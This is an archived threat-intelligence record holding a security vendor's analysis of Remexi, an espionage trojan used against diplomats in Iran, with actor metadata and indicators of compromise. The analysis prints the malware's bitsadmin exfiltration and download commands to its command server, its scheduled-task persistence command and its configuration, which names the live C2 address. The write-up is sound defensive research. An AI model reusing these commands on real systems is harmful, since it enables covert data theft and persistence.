{
	"id": "67cb2d04-3ead-4794-afde-79d5a31ac2e1",
	"created_at": "2026-04-06T00:12:51.818482Z",
	"updated_at": "2026-04-10T13:11:31.206954Z",
	"deleted_at": null,
	"sha1_hash": "e108f8a8648ab67c7161441a325e5c88af915eb9",
	"title": "Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 93457,
	"plain_text": "Chafer used Remexi malware to spy on Iran-based foreign\r\ndiplomatic entities\r\nBy Denis Legezo\r\nPublished: 2019-01-30 · Archived: 2026-04-02 12:31:15 UTC\r\nExecutive Summary\r\nThroughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage\r\ncampaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an\r\nimproved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation.\r\nThis malware has previously been associated with an APT actor that Symantec calls Chafer.\r\nThe malware can exfiltrate keystrokes, screenshots, and browser-related data like cookies and history, decrypted when\r\npossible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses\r\nstandard Windows utilities like the Microsoft Background Intelligent Transfer Service (BITS) tool bitsadmin.exe to\r\nreceive commands and exfiltrate data. Its C2 is based on IIS and uses .asp technology to handle the victims’ HTTP\r\nrequests.\r\nRemexi developers use the C programming language and the GCC compiler on Windows in the MinGW environment.\r\nThey most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence\r\nmechanisms including scheduled tasks, and the Userinit and Run registry keys in the HKLM hive.\r\nXOR and RC4 encryption are used with quite long unique keys for different samples. Among all these random keys,\r\nthe word “salamati” was also used once, which means “health” in Farsi.\r\nKaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and\r\nTrojan.Win32.Agent. This blogpost is based on our original report shared with our APT Intelligence Reporting\r\ncustomers in November 2018. 
For more information please contact: intelreports@kaspersky.com\r\nTechnical analysis\r\nThe main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec\r\nback in 2015. The newest module’s compilation timestamp is March 2018. The developers used the GCC compiler on\r\nWindows in the MinGW environment.\r\nInside the binaries the compiler left references to the names of the C source file modules used: “operation_reg.c”,\r\n“thread_command.c” and “thread_upload.c”. As the module file names suggest, the malware consists of\r\nseveral working threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both\r\nreceiving C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer\r\nService (BITS) mechanism to communicate with the C2 over HTTP.\r\nhttps://securelist.com/chafer-used-remexi-malware/89538/\r\nPage 1 of 8\n\nProliferation\r\nSo far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread.\r\nHowever, we think it’s worth mentioning that for one victim we found a correlation between the execution of\r\nRemexi’s main module and the execution of an AutoIt script compiled as a PE, which we believe may have dropped\r\nthe malware. This dropper used FTP with hardcoded credentials to receive its payload. The FTP server was no longer\r\naccessible at the time of our analysis.\r\nMalware features\r\nRemexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its\r\nconfiguration), steal credentials, logons and the browser history, and execute remote commands. 
Encryption\r\nconsists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting\r\nthe victim’s data.\r\nRemexi includes different modules that it deploys in its working directory, including configuration decryption and\r\nparsing, launching victim activity logging in a separate module, and seven threads for various espionage and\r\nauxiliary functions. The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in\r\nthe table below.\r\nUtility Usage\r\nextract.exe Deploys modules from the .cab file into the working Event Cache directory\r\nbitsadmin.exe Fetches files from the C2 server to parse and execute commands. Sends exfiltrated data\r\ntaskkill.exe Ends the working cycle of modules\r\nPersistence\r\nPersistence modules are based on scheduled tasks and the system registry. Mechanisms vary for different OS versions.\r\nIn the case of old Windows versions like XP, the main module events.exe runs an edited XPTask.vbs Microsoft\r\nsample script to create a weekly scheduled task for itself. For newer operating systems, events.exe creates\r\ntask.xml as follows:\r\nThen it creates a Windows scheduled task using the following command:\r\nschtasks.exe /create /TN \\\"Events\\\\CacheTask_\" /XML \\\"t /F\"\r\nAt the system registry level, modules achieve persistence by adding themselves into the key:\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\r\nwhen it is possible to add values to the Winlogon subkey, and in\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Activity Manager. All such indicators of\r\ncompromise are listed in the corresponding appendix below.\r\nCommands\r\nAll the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system\r\nregistry. 
The standalone thread will decrypt and execute them.\r\nCommand Description\r\nsearch Searches for the corresponding files\r\nsearch\u0026upload Encrypts and adds the corresponding files to the upload directory with the provided name\r\nuploadfile Encrypts and adds the specified file to the upload directory with the provided name\r\nuploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name\r\nshellexecute Silently executes the received command with cmd.exe\r\nwmic Silently executes the received command with wmic.exe (for WMI commands)\r\nsendIEPass Encrypts and adds all gathered browser data into files for upload to the C2\r\nuninstall Removes files, directory and BITS tasks\r\nCryptography\r\nTo decrypt the configuration data, the malware uses XOR with 25-character keys such as\r\n“waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows\r\n32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys, the\r\nword “salamati” was also used once, which means “health” in Farsi.\r\nConfiguration\r\nConfig.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:\r\nField Sample value Description\r\ndiskFullityCheckRatio 1.4 Malware working directory size threshold. It will be deleted if it becomes as large as the free available space multiplied by this ratio\r\ncaptureScreenTimeOut 72; captureActiveWindowTimeOut 313 Probability of full and active window screenshots being taken after a mouse click\r\ncaptureScreenQC 40; captureActiveQC 40 Not really used. Probably full and active window screenshot quality\r\nCaptureSites VPN*0,0; Login*0,0; mail*0,0; Security*0,0 Window titles of interest for screenshots, using the left mouse button and Enter keypress hook\r\nimportant upLog.txt; upSCRLog.txt; upSpecial.txt; upFile.txt; upMSLog.txt List of files to send to the C2 using bitsadmin.exe from the dedicated thread\r\nmaxUpFileSizeKByte 1000000 Maximum size of file uploaded to the C2\r\nServers http://108.61.189.174 Control server HTTP URL\r\nZipPass KtJvOXulgibfiHk Password for uploaded zip archives\r\nbrowserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in the dedicated thread\r\nMost of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut\r\nare worth describing in more detail as their programming logic is not so intuitive.\r\nOne of the malware threads checks in an infinite loop if the mouse button was pressed and also increments\r\nan integer iterator infinitely. If the mouse hooking function registers a button hit, it lets the screenshotting thread\r\nknow about it through a global variable. After that, it checks if the iterator divided by\r\n(captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0. 
In that case, it takes a screenshot.\r\nMain module (events.exe)\r\nSHA256 b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31\r\nMD5 c981273c32b581de824e1fd66a19a281\r\nCompiled GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler\r\nType I386 Windows GUI EXE\r\nSize 68 608\r\nAfter checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility\r\nexpand.exe with the following arguments:\r\nexpand.exe -r \\\"\\\" -f:* \\\"\\\\\\\"\r\nThen it decrypts the config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard\r\nand mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working\r\nthreads:\r\nID Thread description\r\n1 Gets commands from the C2 and saves them to a file and the system registry using the bitsadmin.exe utility\r\n2 Decrypts the command from the registry using RC4 with a hardcoded key, and executes it\r\n3 Transfers screenshots from the clipboard to the \\Cache005 subdirectory and Unicode text from the clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi)\r\n4 Transfers screenshots to the \\Cache005 subdirectory with captureScreenTimeOut and captureActiveWindowTimeOut frequencies\r\n5 Checks the network connection, encrypts and sends gathered logs\r\n6 Unhooks mouse and keyboard, removes the bitsadmin task\r\n7 Checks if the malware’s working directory size already exceeds its threshold\r\n8 Gathers the victim’s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads\r\nThe malware uses the following command to receive data from its C2:\r\nbitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal http:///asp.asp?ui=nrg--\r\nActivity logging module (Splitter.exe)\r\nThis module is called from the main thread to obtain screenshots of 
windows whose titles are specified in the\r\nconfiguration CaptureSites field, bitmaps and text from the clipboard, etc.\r\nSHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff\r\nMD5 1ff40e79d673461cd33bd8b68f8bb5b8\r\nCompiled 2017.08.06 11:32:36 (GMT), 2.22\r\nType I386 Windows Console EXE\r\nSize 101 888\r\nInstead of implementing this auxiliary module in the form of a dynamic-link library with its corresponding\r\nexported functions, the developers decided to use a standalone executable started by events.exe with the following\r\nparameters:\r\nParameter Description\r\n-scr Screenshot file name to save in the Cache006 subdirectory, zipped with the password from the configuration. Can capture the whole screen (“AllScreen”) or the active window (“ActiveWindow”)\r\n-ms Screenshot file name to save in the Cache006 subdirectory, zipped with the password from the configuration. Specifies the screen coordinates to capture\r\n-zip Name of the zip archive protected with the password from the configuration data\r\n-clipboard Screenshot file name where a bitmap from the clipboard is saved in the Cache005 subdirectory, zipped with the password from the configuration\r\nData exfiltration\r\nExfiltration is done through the bitsadmin.exe utility. The BITS mechanism has existed since Windows XP up to\r\nthe current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS\r\nitself. The following is the command used to exfiltrate data from the victim to the C2:\r\nbitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal \"/YP01__\" \"\"\r\nVictims\r\nThe vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. 
Some of\r\nthese appear to be foreign diplomatic entities based in the country.\r\nAttribution\r\nThe Remexi malware has been associated with an APT actor called Chafer by Symantec.\r\nOne of the human-readable encryption keys used is “salamati”. This is probably the Latin spelling of the word\r\n“health” in Farsi. Among the artifacts related to the malware authors, we found in the binaries a .pdb path containing\r\nthe Windows user name “Mohamadreza New”. Interestingly, the FBI website for wanted cybercriminals includes\r\ntwo Iranians called Mohammad Reza, although this could be a common name or even a false flag.\r\nConclusions\r\nActivity of the Chafer APT group has been observed since at least 2015, but based on things like compilation\r\ntimestamps and C\u0026C registration, it’s possible they have been active for even longer. Traditionally, Chafer has\r\nbeen focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.\r\nWe will continue to monitor how this set of activity develops in the future.\r\nIndicators of compromise\r\nFile hashes\r\nevents.exe\r\nsplitter.exe\r\nDomains and IPs\r\n108.61.189.174\r\nHardcoded 
mutexes\r\nLocal\\TEMPDAHCE01\r\nLocal\\zaapr\r\nLocal\\reezaaprLog\r\nLocal\\{Temp-00-aa-123-mr-bbb}\r\nScheduled task\r\nCacheTask_\u003cuser_name_here\u003e\r\nDirectory with malicious modules\r\nMain malware directory: %APPDATA%\\Microsoft\\Event Cache\r\nCommands from C2 in subdirectory: Cache001\\cde00.acf\r\nEvents.exe persistence records in Windows system registry keys\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Activity Manager\r\nVictims’ fingerprints stored in\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\PidRegData or\r\nHKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\PidRegData\r\nRC4 encrypted C2 commands stored in\r\nHKCU\\SOFTWARE\\Microsoft\\Fax\r\nHTTP requests template\r\nhttp://\u003cserver_ip_from_config\u003e/asp.asp?ui=\u003chost_name\u003enrg-\u003cadapter_info\u003e-\u003cuser_name\u003e\r\nAnd a bitsadmin.exe task to external network resources, addressed by IP address\r\nSource: https://securelist.com/chafer-used-remexi-malware/89538/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/chafer-used-remexi-malware/89538/"
	],
	"report_names": [
		"89538"
	],
	"threat_actors": [
		{
			"id": "62947fad-14d2-40bf-a721-b1fc2fbe5b5d",
			"created_at": "2025-08-07T02:03:24.741594Z",
			"updated_at": "2026-04-10T02:00:03.653394Z",
			"deleted_at": null,
			"main_name": "COBALT HICKMAN",
			"aliases": [
				"APT39 ",
				"Burgundy Sandstorm ",
				"Chafer ",
				"ITG07 ",
				"Remix Kitten "
			],
			"source_name": "Secureworks:COBALT HICKMAN",
			"tools": [
				"MechaFlounder",
				"Mimikatz",
				"Remexi",
				"TREKX"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bee22874-f90e-410b-93f3-a2f9b1c2e695",
			"created_at": "2022-10-25T16:07:23.45097Z",
			"updated_at": "2026-04-10T02:00:04.610108Z",
			"deleted_at": null,
			"main_name": "Chafer",
			"aliases": [
				"APT 39",
				"Burgundy Sandstorm",
				"Cobalt Hickman",
				"G0087",
				"ITG07",
				"Radio Serpens",
				"Remix Kitten",
				"TA454"
			],
			"source_name": "ETDA:Chafer",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Antak",
				"CACHEMONEY",
				"EternalBlue",
				"HTTPTunnel",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MechaFlounder",
				"Metasploit",
				"Mimikatz",
				"NBTscan",
				"NSSM",
				"Non-sucking Service Manager",
				"POWBAT",
				"Plink",
				"PuTTY Link",
				"Rana",
				"Remcom",
				"Remexi",
				"RemoteCommandExecution",
				"SafetyKatz",
				"UltraVNC",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"nbtscan",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434371,
	"ts_updated_at": 1775826691,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e108f8a8648ab67c7161441a325e5c88af915eb9.pdf",
		"text": "https://archive.orkl.eu/e108f8a8648ab67c7161441a325e5c88af915eb9.txt",
		"img": "https://archive.orkl.eu/e108f8a8648ab67c7161441a325e5c88af915eb9.jpg"
	}
}